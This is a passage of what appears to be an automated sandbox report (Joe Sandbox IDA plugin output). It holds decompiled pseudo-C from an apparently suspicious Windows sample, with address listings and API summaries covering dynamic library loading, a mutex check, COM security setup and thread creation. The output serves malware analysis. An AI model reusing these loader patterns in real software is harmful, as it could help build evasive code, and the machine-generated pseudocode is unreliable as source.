												_t319 =  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24));
												_t407 =  *0x3b857c; // 0x1
												 *(_t319 + _t407 * 8) = _t465;
												_t455 =  *0x3b857c; // 0x1
												 *(_t319 + 4 + _t455 * 8) = _t459;
												goto L33;
											}
											__eflags = _t318 - 1;
											if(_t318 != 1) {
												E0039C870(_t466 - 0x5c0, _t318);
												_t468 = _t473 + 8;
											}
											_t320 =  *0x3b8628; // 0x593938
											 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc8))))(0x3e8);
											goto L83;
										}
										__eflags = _t256 - 0x3840;
										if(__eflags <= 0) {
											goto L33;
										}
										goto L28;
									}
									_t457 =  *0x3b8628; // 0x593938
									 *((intOrPtr*)( *((intOrPtr*)(_t457 + 0xc8))))(0x3e8);
									L84:
									_t385 =  *0x3b857c; // 0x1
									_t249 =  *(_t466 - 0x5b8);
									_t369 = _t385 + 1;
									 *0x3b857c = _t369;
									__eflags = _t369 -  *((intOrPtr*)(_t249 + 0x18));
								} while (__eflags < 0);
								L85:
								_t251 = E003B0A40(_t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5b8);
								_t468 = _t468 + 8;
								__eflags = _t251;
								if(_t251 == 0) {
									__eflags =  *(_t466 - 0x20) - _t333;
									if(__eflags == 0) {
										L003B0D30(_t333, _t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5c0);
										_t468 = _t468 + 8;
									}
								}
							}
						} else {
							L18:
							E00391700(_t466 - 0xc);
							E0039F850(_t333, _t466 - 0x5c0);
							E0039C930(_t466 - 4);
							goto L89;
						}
					} else {
						E0039C930(_t466 - 4);
						goto L89;
					}
				} else {
					E003B0BB0(_t333, _t479);
					E0039C930(_t466 - 4);
					goto L89;
				}
			}














































































    0x0039fc20
    0x0039fc20
    0x0039fc2d
    0x0039fc32
    0x0039fc40
    0x0039fc43
    0x0039fc47
    0x0039fc58
    0x0039fc5e
    0x0039fc64
    0x0039fc6a
    0x0039fc77
    0x0039fc79
    0x0039fc8b
    0x0039fc8d
    0x0039fc9f
    0x0039fcb3
    0x0039fcb5
    0x0039fcc4
    0x0039fcca
    0x0039fccd
    0x0039fcd2
    0x0039fcd7
    0x0039fcd9
    0x003a03e9
    0x003a03e9
    0x003a03ef
    0x003a04eb
    0x003a04eb
    0x003a04f0
    0x003a04f6
    0x003a04f6
    0x003a03f5
    0x003a03fb
    0x003a0403
    0x003a0406
    0x003a0409
    0x003a040c
    0x003a040f
    0x003a0412
    0x003a0423
    0x003a0429
    0x003a0434
    0x003a0439
    0x003a0440
    0x003a0495
    0x003a049c
    0x003a04b7
    0x003a04bc
    0x003a04c9
    0x003a04ce
    0x003a04db
    0x003a04e1
    0x003a04e9
    0x00000000
    0x003a04e9
    0x003a0442
    0x003a0445
    0x003a044a
    0x003a0450
    0x003a0450
    0x003a0458
    0x00000000
    0x00000000
    0x003a045a
    0x003a0460
    0x00000000
    0x00000000
    0x003a0462
    0x003a0465
    0x003a0468
    0x003a046b
    0x003a046c
    0x00000000
    0x00000000
    0x003a0474
    0x003a0474
    0x003a0477
    0x003a047c
    0x003a047e
    0x003a0483
    0x003a0485
    0x003a0491
    0x003a0491
    0x003a0493
    0x00000000
    0x003a0493
    0x003a0470
    0x003a0472
    0x00000000
    0x00000000
    0x00000000
    0x003a0472
    0x0039fce2
    0x0039fce7
    0x0039fce9
    0x0039fd01
    0x0039fd04
    0x0039fd0b
    0x0039fd11
    0x0039fd13
    0x0039fd20
    0x0039fd25
    0x0039fd25
    0x0039fd28
    0x0039fd2d
    0x0039fd2f
    0x0039fd34
    0x0039fd39
    0x0039fd3c
    0x0039fd3e
    0x0039fd4b
    0x0039fd4b
    0x0039fd40
    0x0039fd47
    0x0039fd47
    0x0039fd4f
    0x0039fd54
    0x0039fd56
    0x0039fd65
    0x0039fd67
    0x0039fd6b
    0x0039fd70
    0x0039fd71
    0x0039fd76
    0x0039fd76
    0x0039fd79
    0x0039fd7f
    0x0039fd8a
    0x0039fd90
    0x0039fd96
    0x0039fda7
    0x0039fdaf
    0x0039fdb7
    0x0039fdbc
    0x0039fdbe
    0x0039fdc1
    0x0039fdc4
    0x0039fdc9
    0x0039fdcc
    0x0039fdce
    0x0039fddf
    0x0039fdd0
    0x0039fdd7
    0x0039fdd7
    0x0039fdee
    0x0039fe05
    0x0039fe18
    0x0039fe28
    0x0039fe2d
    0x0039fe30
    0x0039fe32
    0x0039fe5d
    0x0039fe72
    0x0039fe74
    0x00000000
    0x00000000
    0x0039fe7c
    0x0039fe99
    0x0039fea2
    0x0039fea5
    0x0039fea8
    0x0039feab
    0x0039feae
    0x0039feb1
    0x0039feb4
    0x0039feb7
    0x0039feba
    0x0039febc
    0x0039fec0
    0x0039fec0
    0x0039fec6
    0x0039fec8
    0x0039fece
    0x0039fed1
    0x0039fed4
    0x00000000
    0x00000000
    0x0039fee0
    0x0039fee3
    0x0039fef4
    0x0039fef9
    0x0039fefb
    0x0039ff16
    0x0039ff25
    0x0039ff27
    0x0039ff2d
    0x0039ff30
    0x0039ff32
    0x0039ff32
    0x0039ff37
    0x0039ff3b
    0x0039ff3e
    0x0039ffac
    0x0039ffbb
    0x0039ffbd
    0x0039ffc2
    0x0039ffc5
    0x0039ffc7
    0x0039ffff
    0x003a0002
    0x003a0007
    0x003a0007
    0x003a000c
    0x003a000f
    0x003a0012
    0x003a0041
    0x003a0048
    0x003a004d
    0x003a0053
    0x003a0058
    0x003a005a
    0x003a005c
    0x003a0091
    0x003a00cc
    0x003a00cd
    0x003a00db
    0x003a00e6
    0x003a00ed
    0x003a00ee
    0x003a00f0
    0x003a00f6
    0x003a0093
    0x003a0099
    0x003a009a
    0x003a00a8
    0x003a00b3
    0x003a00b4
    0x003a00ba
    0x003a00bb
    0x003a00c3
    0x003a00c3
    0x003a005e
    0x003a0064
    0x003a0065
    0x003a0073
    0x003a0078
    0x003a007e
    0x003a0085
    0x003a0086
    0x003a008e
    0x003a008e
    0x003a00f7
    0x003a00fc
    0x003a00ff
    0x003a0102
    0x003a0104
    0x003a010a
    0x003a010c
    0x003a0111
    0x003a0114
    0x003a0116
    0x003a0119
    0x003a0133
    0x003a0146
    0x003a014b
    0x003a0158
    0x003a015b
    0x003a015e
    0x003a0161
    0x003a0164
    0x003a0166
    0x003a0166
    0x003a016b
    0x003a016d
    0x003a016d
    0x003a0172
    0x003a0175
    0x003a0178
    0x003a01d3
    0x003a01d3
    0x003a01d3
    0x003a01d6
    0x003a01d9
    0x003a01dc
    0x003a028f
    0x003a0295
    0x003a029a
    0x003a029c
    0x003a0372
    0x003a0372
    0x003a0372
    0x00000000
    0x003a0372
    0x003a02a8
    0x003a02aa
    0x003a02ab
    0x003a02b0
    0x003a02b3
    0x003a02b5
    0x00000000
    0x00000000
    0x003a02bb
    0x003a02c2
    0x003a02c7
    0x003a02ca
    0x003a02cc
    0x003a0369
    0x003a0370
    0x003a03cc
    0x003a03cf
    0x003a03da
    0x003a03e2
    0x003a03e7
    0x003a03e7
    0x00000000
    0x003a03e7
    0x00000000
    0x003a0370
    0x003a02d2
    0x003a02d9
    0x00000000
    0x00000000
    0x003a02df
    0x003a02e4
    0x003a02e9
    0x003a02eb
    0x003a02fc
    0x003a02ff
    0x003a0301
    0x003a0310
    0x003a0310
    0x003a0310
    0x003a0316
    0x003a0318
    0x00000000
    0x00000000
    0x003a031a
    0x003a032b
    0x003a032d
    0x003a032e
    0x003a0330
    0x00000000
    0x00000000
    0x00000000
    0x003a0330
    0x00000000
    0x003a0310
    0x003a0303
    0x003a0303
    0x003a0303
    0x003a0304
    0x003a0307
    0x00000000
    0x003a0307
    0x003a02ed
    0x003a02ed
    0x003a02f0
    0x00000000
    0x003a02f0
    0x003a01e2
    0x003a01f0
    0x003a01fb
    0x003a0201
    0x003a0206
    0x003a0208
    0x003a020a
    0x003a0245
    0x003a0246
    0x003a0254
    0x003a025f
    0x003a0260
    0x003a0266
    0x003a0267
    0x003a026f
    0x003a020c
    0x003a0212
    0x003a0213
    0x003a0221
    0x003a0226
    0x003a022c
    0x003a0233
    0x003a0234
    0x003a023c
    0x003a023c
    0x003a0270
    0x003a0279
    0x003a0280
    0x003a0286
    0x003a0289
    0x003a028c
    0x00000000
    0x003a028c
    0x003a01e4
    0x003a01ea
    0x00000000
    0x00000000
    0x00000000
    0x003a01ea
    0x003a017a
    0x003a0183
    0x003a018c
    0x003a0194
    0x003a0194
    0x003a0197
    0x003a0199
    0x003a019d
    0x003a01a0
    0x00000000
    0x00000000
    0x003a01a2
    0x003a01ab
    0x003a01bd
    0x003a01c0
    0x003a01c3
    0x003a01c8
    0x003a01cb
    0x003a01cd
    0x003a0354
    0x003a0359
    0x003a035b
    0x00000000
    0x00000000
    0x003a035d
    0x00000000
    0x003a035d
    0x00000000
    0x003a01cd
    0x003a01a4
    0x003a01a9
    0x00000000
    0x00000000
    0x00000000
    0x003a01a9
    0x003a017c
    0x003a0181
    0x00000000
    0x00000000
    0x00000000
    0x003a0181
    0x003a011d
    0x003a011d
    0x003a0122
    0x003a0125
    0x003a0128
    0x00000000
    0x00000000
    0x003a012a
    0x00000000
    0x00000000
    0x003a012c
    0x003a0131
    0x00000000
    0x00000000
    0x00000000
    0x003a0332
    0x003a0335
    0x003a0336
    0x003a0339
    0x003a0339
    0x00000000
    0x003a0342
    0x003a0014
    0x003a001d
    0x003a002b
    0x003a0030
    0x003a0033
    0x003a0035
    0x00000000
    0x00000000
    0x003a003b
    0x003a003e
    0x00000000
    0x003a003e
    0x003a0016
    0x003a001b
    0x00000000
    0x00000000
    0x00000000
    0x003a001b
    0x0039ffc9
    0x0039ffcc
    0x0039ffd6
    0x0039ffdb
    0x0039ffdb
    0x0039ffde
    0x0039ffef
    0x00000000
    0x0039ffef
    0x0039ff40
    0x0039ff49
    0x0039ff58
    0x0039ff5d
    0x0039ff60
    0x0039ff62
    0x0039ff96
    0x0039ff99
    0x0039ff9f
    0x0039ffa2
    0x0039ffa8
    0x00000000
    0x0039ffa8
    0x0039ff64
    0x0039ff67
    0x0039ff71
    0x0039ff76
    0x0039ff76
    0x0039ff79
    0x0039ff89
    0x00000000
    0x0039ff89
    0x0039ff42
    0x0039ff47
    0x00000000
    0x00000000
    0x00000000
    0x0039ff47
    0x0039fefd
    0x0039ff0e
    0x003a0374
    0x003a0374
    0x003a037a
    0x003a0380
    0x003a0381
    0x003a0387
    0x003a0387
    0x003a0390
    0x003a039b
    0x003a03a0
    0x003a03a3
    0x003a03a5
    0x003a03ab
    0x003a03ae
    0x003a03bf
    0x003a03c4
    0x003a03c4
    0x003a03ae
    0x003a03a5
    0x0039fe34
    0x0039fe34
    0x0039fe37
    0x0039fe42
    0x0039fe4a
    0x00000000
    0x0039fe4a
    0x0039fd58
    0x0039fd5b
    0x00000000
    0x0039fd5b
    0x0039fceb
    0x0039fceb
    0x0039fcf3
    0x00000000
    0x0039fcf3

    APIs
    • Sleep.KERNELBASE(00000001), ref: 0039FC40
    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0039FCB3
    • srand.MSVCRT ref: 0039FCC4
      • Part of subcall function 0039EB30: LoadLibraryW.KERNEL32(?), ref: 0039EB82
      • Part of subcall function 0039EB30: LoadLibraryW.KERNEL32(?), ref: 0039EBA9
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBD7
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBFF
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC27
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC4F
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E30000,?), ref: 0039EC77
      • Part of subcall function 0039BAF0: CoInitializeEx.OLE32(00000000,00000000), ref: 0039BAF4
      • Part of subcall function 0039BAF0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0039BB13
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00393500: CreateMutexW.KERNELBASE(?,00000001,?), ref: 0039358B
      • Part of subcall function 00393500: ExitProcess.KERNEL32 ref: 003935AE
      • Part of subcall function 003B0BB0: ??2@YAPAXI@Z.MSVCRT ref: 003B0C80
      • Part of subcall function 003B0BB0: ??3@YAXPAX@Z.MSVCRT ref: 003B0D1D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B2480, Relevance: 10.6, APIs: 7, Instructions: 99sleep
    C-Code - Quality: 54%
    			E003B2480(void* __eax, long __ebx, LONG* __edi, long __esi) {
				signed int _t18;
				signed int _t19;
				signed int _t20;
				int* _t21;
				int _t22;
				int _t24;
				signed int _t31;
				long _t32;
				signed int _t33;
				signed int _t36;
				LONG* _t43;
				signed int _t46;
				void* _t48;
				void* _t54;

				L0:
				while(1) {
					L0:
					_t43 = __edi;
					_t32 = __ebx;
					if(__eax == __esi) {
						break;
					}
					L3:
					Sleep(0x3e8);
					if(InterlockedCompareExchange(__edi, __esi, __ebx) == __ebx) {
						L4:
						_t46 = 1;
						__eflags = 1;
					} else {
						continue;
					}
					L5:
					_t18 =  *0x3b8c38; // 0x2
					if(_t18 != _t46) {
						L7:
						_t19 =  *0x3b8c38; // 0x2
						__eflags = _t19;
						if(__eflags != 0) {
							L11:
							 *0x3b865c = _t46;
							goto L12;
						} else {
							L8:
							 *0x3b8c38 = _t46;
							_t31 = E003A1B59(0x3b3240, 0x3b324c); // executed
							__eflags = _t31;
							if(__eflags == 0) {
								goto L12;
							} else {
								L10:
								goto L38;
							}
						}
					} else {
						L6:
						_push(0x1f);
						L0039F19C();
						L12:
						_t20 =  *0x3b8c38; // 0x2
						if(_t20 == _t46) {
							_push(0x3b323c);
							_push(0x3b3234); // executed
							L003927A8(); // executed
							 *0x3b8c38 = 2;
						}
						if( *((intOrPtr*)(_t48 - 0x20)) == _t32) {
							InterlockedExchange(_t43, _t32);
						}
						_t54 =  *0x3b8c40 - _t32; // 0x0
						if(_t54 != 0) {
							_push(0x3b8c40);
							if(E00393D60(_t32, _t43, _t46, _t54) != 0) {
								 *0x3b8c40(_t32, 2, _t32);
							}
						}
						_t21 = __imp___wcmdln;
						if( *_t21 == _t32) {
							L38:
							 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
							_t22 = 0xff;
						} else {
							L20:
							_t24 =  *_t21;
							while(1) {
								L21:
								 *(_t48 - 0x24) = _t24;
								_t33 =  *_t24 & 0x0000ffff;
								if(_t33 > 0x20 || _t33 != _t32 &&  *(_t48 - 0x1c) != _t32) {
									goto L32;
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t36 =  *_t24 & 0x0000ffff;
									if(_t36 == _t32 || _t36 > 0x20) {
										break;
									}
									L26:
									_t24 = _t24 + 2;
									 *(_t48 - 0x24) = _t24;
								}
								L27:
								__eflags =  *(_t48 - 0x40) & 0x00000001;
								if(( *(_t48 - 0x40) & 0x00000001) == 0) {
									_t33 = 0xa;
								} else {
									_t33 =  *(_t48 - 0x3c) & 0x0000ffff;
								}
								_push(_t33);
								_push(_t24);
								_push(_t32);
								_push(0x390000); // executed
								L0039FBF0(); // executed
								 *0x3b8658 = _t24;
								__eflags =  *0x3b864c - _t32; // 0x0
								if(__eflags == 0) {
									L31:
									exit(_t24);
									goto L32;
								}
								L35:
								__eflags =  *0x3b865c - _t32; // 0x0
								if(__eflags == 0) {
									__imp___cexit();
								}
								L37:
								 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
								_t22 =  *0x3b8658; // 0x0
								goto L39;
								L32:
								__eflags = _t33 - 0x22;
								if(_t33 == 0x22) {
									__eflags =  *(_t48 - 0x1c) - _t32;
									_t12 =  *(_t48 - 0x1c) == _t32;
									__eflags = _t12;
									 *(_t48 - 0x1c) = 0 | _t12;
								}
								_t24 = _t24 + 2;
							}
						}
					}
					L39:
					return E003B2829(_t22);
					L40:
				}
				L2:
				_t46 = 1;
				 *((intOrPtr*)(_t48 - 0x20)) = 1;
				goto L5;
			}

















    0x003b2480
    0x003b2480
    0x003b2480
    0x003b2480
    0x003b2480
    0x003b2482
    0x00000000
    0x00000000
    0x003b248c
    0x003b2491
    0x003b247e
    0x003b2499
    0x003b249b
    0x003b249b
    0x00000000
    0x00000000
    0x00000000
    0x003b249c
    0x003b249c
    0x003b24a3
    0x003b24af
    0x003b24af
    0x003b24b4
    0x003b24b6
    0x003b24d8
    0x003b24d8
    0x00000000
    0x003b24b8
    0x003b24b8
    0x003b24b8
    0x003b24c8
    0x003b24cf
    0x003b24d1
    0x00000000
    0x003b24d3
    0x003b24d3
    0x00000000
    0x003b24d3
    0x003b24d1
    0x003b24a5
    0x003b24a5
    0x003b24a5
    0x003b24a7
    0x003b24de
    0x003b24de
    0x003b24e5
    0x003b24e7
    0x003b24ec
    0x003b24f1
    0x003b24f8
    0x003b24f8
    0x003b2505
    0x003b2509
    0x003b2509
    0x003b250f
    0x003b2515
    0x003b2517
    0x003b2524
    0x003b252a
    0x003b252a
    0x003b2524
    0x003b2530
    0x003b2537
    0x003b2602
    0x003b2602
    0x003b2609
    0x003b253d
    0x003b253d
    0x003b253d
    0x003b253f
    0x003b253f
    0x003b253f
    0x003b2542
    0x003b2549
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003b2555
    0x003b2555
    0x003b2555
    0x003b255b
    0x00000000
    0x00000000
    0x003b2563
    0x003b2564
    0x003b2565
    0x003b2565
    0x003b256a
    0x003b256a
    0x003b256e
    0x003b2578
    0x003b2570
    0x003b2570
    0x003b2570
    0x003b2579
    0x003b257a
    0x003b257b
    0x003b257c
    0x003b2581
    0x003b2586
    0x003b258b
    0x003b2591
    0x003b2593
    0x003b2594
    0x00000000
    0x003b2594
    0x003b25df
    0x003b25df
    0x003b25e5
    0x003b25e7
    0x003b25e7
    0x003b25ed
    0x003b25ed
    0x003b25f4
    0x00000000
    0x003b259a
    0x003b259a
    0x003b259e
    0x003b25a2
    0x003b25a5
    0x003b25a5
    0x003b25a8
    0x003b25a8
    0x003b25ac
    0x003b25ac
    0x003b253f
    0x003b2537
    0x003b260e
    0x003b2613
    0x00000000
    0x003b2613
    0x003b2484
    0x003b2486
    0x003b2487
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039A590, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 382thread
    C-Code - Quality: 86%
    			E0039A590(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v28;
				intOrPtr _v32;
				signed int _v40;
				intOrPtr _v48;
				signed int _v60;
				char _v260;
				void* __edi;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t186;
				void _t187;
				void* _t188;
				intOrPtr _t202;
				signed int _t207;
				signed int _t210;
				intOrPtr _t211;
				intOrPtr _t212;
				signed int _t214;
				signed int _t217;
				signed int _t222;
				signed int _t223;
				signed int _t229;
				signed int _t233;
				intOrPtr _t235;
				signed int _t236;
				intOrPtr _t239;
				signed int _t242;
				intOrPtr* _t245;
				void* _t252;
				intOrPtr _t262;
				intOrPtr _t264;
				signed int _t273;
				intOrPtr _t276;
				signed int _t278;
				signed int _t282;
				signed int _t286;
				signed int _t289;
				void* _t290;
				intOrPtr _t302;
				signed int _t306;
				signed int _t310;
				signed int _t312;
				intOrPtr _t313;
				signed int _t316;
				intOrPtr _t320;
				signed int _t324;
				signed int _t332;
				intOrPtr* _t333;
				void* _t334;
				void* _t336;

				_t333 = __ecx;
				_t252 = 0;
				_t332 = 0;
				if( *__ecx <= 0) {
					L61:
					return 1;
				} else {
					do {
						if(_t252 != 0) {
							_t178 =  *_t252;
							__eflags = _t178;
							if(_t178 != 0) {
								E0039BB40(_t178);
								_t334 = _t334 + 4;
							}
							_t179 =  *(_t252 + 4);
							__eflags = _t179;
							if(_t179 != 0) {
								E0039BB40(_t179);
								_t334 = _t334 + 4;
							}
							_t180 =  *(_t252 + 8);
							__eflags = _t180;
							if(_t180 != 0) {
								E0039BB40(_t180);
								_t334 = _t334 + 4;
							}
							_t181 =  *(_t252 + 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								E0039BB40(_t181);
								_t334 = _t334 + 4;
							}
							_t182 =  *(_t252 + 0xc);
							__eflags = _t182;
							if(_t182 != 0) {
								E0039BB40(_t182);
								_t334 = _t334 + 4;
							}
							goto L14;
						} else {
							_t188 = E003A1D90(0x1c, _t252);
							_t334 = _t334 + 8;
							_t252 = _t188;
							L14:
							 *_t252 = 0;
							 *(_t252 + 4) = 0;
							 *(_t252 + 8) = 0;
							 *(_t252 + 0xc) = 0;
							_t8 = _t252 + 0xc; // 0xc
							 *(_t252 + 0x10) = 0;
							 *((intOrPtr*)(_t252 + 0x14)) = 0;
							_t11 = _t252 + 0x14; // 0x14
							 *((intOrPtr*)(_t252 + 0x18)) = 0;
							_t13 = _t252 + 0x10; // 0x10
							_t14 = _t252 + 8; // 0x8
							_t16 = _t252 + 4; // 0x4
							_t186 = E00399540( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)), _t332, _t16, _t14, _t13, _t11, _t8); // executed
							_v20 = _t186;
							_t187 = E00394F50( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)));
							 *_t252 = _t187;
							if(_v20 == 0) {
								goto L48;
							}
							_t340 = _t187;
							if(_t187 == 0) {
								goto L48;
							}
							_v8 = 0xffffffff;
							_v16 = 0;
							E00399090(_t340,  &_v260, 0xc2);
							_t202 =  *0x3b8628; // 0x593938
							_t334 = _t334 + 8;
							_push( &_v260);
							_push( *(_t252 + 4));
							if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xe0))))() != 0) {
								E00399090(__eflags,  &_v260, 0xbe);
								_t302 =  *0x3b8628; // 0x593938
								_t334 = _t334 + 8;
								_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xe0))))( *(_t252 + 4),  &_v260);
								__eflags = _t207;
								if(__eflags != 0) {
									E00399090(__eflags,  &_v260, 0xb);
									_t262 =  *0x3b8628; // 0x593938
									_t336 = _t334 + 8;
									_t210 =  *((intOrPtr*)( *((intOrPtr*)(_t262 + 0xe0))))( *(_t252 + 4),  &_v260);
									__eflags = _t210;
									if(_t210 == 0) {
										L34:
										_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4));
										_v16 = 1;
										_v8 = 0;
										__eflags =  *(_t211 + 0x4c);
										if( *(_t211 + 0x4c) <= 0) {
											L38:
											_t212 =  *((intOrPtr*)(_t333 + 4));
											_t264 =  *((intOrPtr*)(_t212 + _t332 * 4));
											_t306 = _v8;
											__eflags = _t306 -  *((intOrPtr*)(_t264 + 0x4c));
											if(_t306 >=  *((intOrPtr*)(_t264 + 0x4c))) {
												L42:
												 *((intOrPtr*)(_t252 + 0x18)) = _a4;
												_t214 = E003966C0( *(_t252 + 4));
												_t334 = _t336 + 4;
												_v20 = _t214;
												CreateThread(0, 0, E003944B0, _t252, 0,  &_v28); // executed
												_t252 = 0;
												__eflags = _v16;
												if(_v16 == 0) {
													goto L48;
												}
												_t217 = _v8;
												__eflags = _t217;
												if(_t217 < 0) {
													L62:
													_t222 = E003A1D90( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) + 1 << 4,  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48));
													_t334 = _t334 + 8;
													_v16 = _t222;
													__eflags = _t222;
													if(_t222 == 0) {
														L46:
														_t223 = _v20;
														__eflags = _t223;
														if(_t223 != 0) {
															E0039BB40(_t223);
															_t334 = _t334 + 4;
														}
														goto L48;
													}
													_t310 = _v20;
													 *((intOrPtr*)(_t222 + ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c))) * 8)) = _t310;
													__imp___time64(0);
													_v48 = _t310;
													_t312 = _v16;
													_t273 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c));
													 *(_t312 + 8 + _t273 * 8) = _t222;
													 *((intOrPtr*)(_t312 + 0xc + _t273 * 8)) = _v48;
													 *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48) = _t312;
													_t334 = _t334 + 4;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) + 1;
													goto L48;
												}
												_t313 =  *((intOrPtr*)(_t333 + 4));
												_t276 =  *((intOrPtr*)(_t313 + _t332 * 4));
												__eflags = _t217 -  *((intOrPtr*)(_t276 + 0x4c));
												if(_t217 >=  *((intOrPtr*)(_t276 + 0x4c))) {
													goto L62;
												}
												__imp___time64(0);
												_v32 = _t313;
												_t278 =  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48);
												_t334 = _t334 + 4;
												_t316 = _v8 + _v8;
												__eflags = _t316;
												 *(_t278 + 8 + _t316 * 8) = _t217;
												 *((intOrPtr*)(_t278 + 0xc + _t316 * 8)) = _v32;
												goto L46;
											}
											__imp___time64(0);
											_v40 = _t306;
											_t334 = _t336 + 4;
											_t229 = _t212 -  *((intOrPtr*)( *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48) + 8 + (_v8 + _v8) * 8));
											__eflags = _t229;
											_v60 = _t229;
											asm("sbb eax, [edx+ecx*8+0xc]");
											_t282 = _v60;
											_v20 = _v40;
											if(__eflags < 0) {
												goto L48;
											}
											if(__eflags > 0) {
												goto L42;
											}
											__eflags = _t282 - 0x708;
											if(_t282 < 0x708) {
												goto L48;
											}
											goto L42;
										}
										_v12 = 0;
										while(1) {
											_t320 =  *0x3b8628; // 0x593938
											_t233 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xe0))))( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x48)) + _v12)),  *(_t252 + 4));
											__eflags = _t233;
											if(_t233 == 0) {
												goto L38;
											}
											_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4));
											_v12 = _v12 + 0x10;
											_t286 = _v8 + 1;
											_v8 = _t286;
											__eflags = _t286 -  *(_t211 + 0x4c);
											if(_t286 <  *(_t211 + 0x4c)) {
												continue;
											}
											goto L38;
										}
										goto L38;
									}
									_v260 = 0x44;
									_t235 =  *0x3b8628; // 0x593938
									_t236 =  *((intOrPtr*)( *((intOrPtr*)(_t235 + 0xe0))))( *(_t252 + 4),  &_v260);
									__eflags = _t236;
									if(_t236 != 0) {
										goto L42;
									}
									goto L34;
								}
								_t289 =  *(_t252 + 8);
								__eflags = _t289;
								if(_t289 == 0) {
									goto L48;
								}
								__eflags =  *_t289 - _t207;
								if( *_t289 == _t207) {
									goto L48;
								}
								while(1) {
									__eflags = _t207 - 0x200;
									if(_t207 >= 0x200) {
										break;
									}
									_t207 = _t207 + 1;
									__eflags =  *((char*)(_t289 + _t207));
									if( *((char*)(_t289 + _t207)) != 0) {
										continue;
									}
									break;
								}
								_t36 = _t207 - 1; // 0x0
								__eflags = _t36 - 0x1fe;
								if(_t36 > 0x1fe) {
									goto L48;
								}
								_v20 = E0039B230(_t289, _t207);
								_t239 =  *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4));
